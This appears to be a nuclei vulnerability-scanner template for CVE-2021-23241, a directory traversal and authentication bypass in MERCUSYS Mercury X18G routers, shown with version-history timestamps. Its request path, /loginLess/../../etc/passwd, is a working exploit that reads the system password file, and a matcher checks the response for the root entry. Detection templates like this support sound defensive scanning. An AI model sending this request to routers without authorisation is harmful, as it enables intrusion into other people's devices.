nuclei-templates/cves/2021/CVE-2021-23241.yaml

28 lines
841 B
YAML
Raw Normal View History

2021-07-20 08:52:10 +00:00
id: CVE-2021-23241
info:
name: Mercury Router Web Server Directory Traversal
author: daffainfo
severity: medium
2021-07-20 08:55:37 +00:00
description: MERCUSYS Mercury X18G 1.0.5 devices allow Directory Traversal via ../ in conjunction with a loginLess or login.htm URI (for authentication bypass) to the web server, as demonstrated by the /loginLess/../../etc/passwd URI.
reference: |
- https://github.com/BATTZION/MY_REQUEST/blob/master/Mercury%20Router%20Web%20Server%20Directory%20Traversal.md
- https://nvd.nist.gov/vuln/detail/CVE-2021-23241
2021-07-20 08:53:39 +00:00
tags: cve,cve2021,iot,lfi,router
2021-07-20 08:52:10 +00:00
requests:
- method: GET
path:
- "{{BaseURL}}/loginLess/../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[0*]:0:0"
part: body
2021-07-20 10:30:00 +00:00
2021-07-20 08:52:10 +00:00
- type: status
status:
- 200